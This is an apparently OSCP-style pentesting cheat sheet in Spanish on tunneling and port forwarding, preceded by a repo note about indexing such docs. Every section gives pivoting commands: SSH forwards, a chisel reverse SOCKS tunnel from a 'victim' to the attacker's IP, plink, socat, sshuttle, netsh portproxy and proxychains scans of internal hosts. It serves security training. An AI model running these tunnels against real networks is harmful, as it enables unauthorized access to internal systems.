El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
1.4 KiB
1.4 KiB
Tunneling y port forwarding
Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.
SSH (el más portable)
ssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 → servicio interno
ssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390
ssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080
# luego: proxychains <herramienta> (configura socks en /etc/proxychains4.conf)
Chisel (cuando no hay SSH)
# Kali (servidor):
./chisel server -p 8000 --reverse
# Víctima (cliente) → SOCKS reverso:
./chisel client TU_IP:8000 R:socks
# ahora: proxychains nmap -sT -Pn 192.168.5.10
socat (redirección simple)
socat TCP-LISTEN:8080,fork TCP:192.168.5.10:80
Plink (SSH desde Windows)
plink.exe -R 3390:127.0.0.1:3389 user@TU_IP
sshuttle (VPN improvisada, lo más cómodo)
sshuttle -r user@pivot 192.168.5.0/24 --dns
Windows nativo — netsh portproxy
netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80
proxychains
proxychains nmap -sT -Pn IP→ usa-sT(TCP connect): el SYN scan no pasa por el proxy. Ver Nmap NSE.
Relacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC